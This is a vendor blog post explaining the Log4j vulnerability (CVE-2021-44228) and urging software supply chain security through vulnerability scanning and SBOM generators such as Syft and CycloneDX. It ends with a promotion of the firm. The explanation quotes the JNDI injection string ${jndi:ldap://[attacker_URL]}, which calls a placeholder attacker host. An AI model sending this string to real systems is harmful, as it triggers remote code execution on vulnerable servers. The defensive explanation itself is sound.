Neutralize Your Software Supply Chain From Cyber Attacks - SBOM Security Explained
As we approach Christmas around the world there is a global attack on our technical infrastructure via the Log4J vulnerability.
If you are unfamiliar with Log4j a quick google or search of CVE-2021-44228 will bring you up to speed. In short,
Log4J is a vulnerability with the open-source java based logging utility framework that allows devs to log data within their applications and is part of the apache logging services, a project of the Apache Software Foundation.
Log4J is used by thousands of websites and apps to perform important functions such as logging that can be used for debugging and other purposes.
What Is Log4j
According to infosecwriteups.com “The vulnerability allows unauthenticated remote code execution. Attackers can take advantage of it by just insert a line of code like ${jndi:ldap://[attacker_URL]} . This vulnerability can be found in products of some of the most famous technology vendors such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMWare”
Log4j allows logged messages to contain format strings that reference external information through the Java Naming and Directory Interface (JNDI).
This allows information to be remotely retrieved across a variety of protocols, including the Lightweight Directory Access Protocol (LDAP).{For better understanding take a look on given diagram}
CISA Director Jen Easterly has called this security flaw the “most serious” vulnerability she’s seen in her decades-long career and that it could take years to address.
Now is the time to take software supply chain security seriously.
What is Software Supply Chain Security
Software supply chain security is a term that has been gaining much ground over the last two years but, most organizations have not taken its adoption with the seriousness that it deserves. Your software supply chain is made up of ready-made components—either open source, provided by third-party software vendors, written as proprietary custom code, or consumed via external APIs.
What Can I Do About It?
The first thing you need to do is adopt a solid vulnerability scanning tool and cadence. The right tool will be cross platform, and will show you exactly what needs to be addressed no matter if the target is a physical host, virtual machine, container, or a pod.
Lamon Orange CISO of Netskope has some great advice for IT professionals
1. Lead with empathy and reach out to your security circles.
2. Get the clearest possible understanding of what's happening in your environment.
3. Identify your true partners and make changes to those you do business with.
4. Share threat intelligence data without marketing in mind.
Tools That Can Help…SBOMs to the rescue!
A “Software Bill of Materials” (SBOM) is a nested inventory for software, a list of ingredients that make up software components. The following documents were drafted by stakeholders in an open and transparent process to address transparency around software components and were approved by a consensus of participating stakeholders.
We recently just covered SBOMs on Cloud Drops Episode 001 on our youtube but here is the TLDR
Seriously look into creating SBOMs in order to speed up knowledge gathering of your containers, libs, binaries, applications, and clusters.
SBOM Generators:
Anchore Syft: https://github.com/anchore/syft
GitHub Action for Syft: https://github.com/anchore/sbom-action
SPDX (Software Package Data Exchange): International Open Standard ISO/IEC 5962:2021 - 8/21 https://github.com/opensbom-generator/spdx-sbom-generator
CycloneDX: https://github.com/CycloneDX/cyclonedx-cli
Kubernetes SIG BOM: https://sigs.k8s.io/bom
ThnkBIG is a global technology services, solutions, and staffing firm specializing in Kubernetes Implementation & Operationalization and DevOps Cloud Services to small medium-sized businesses, smb commercial, and government customers. As the number one DevOps, Kubernetes, and Cloud Management subject matter experts in Austin Texas; our managed and consulting services are first class and enterprise ready. We scale as your business needs increase. With our cloud native expertise, we operationalize Kubernetes environments both large and small using best practices, automation, cloud-native open-source tools, and technology.
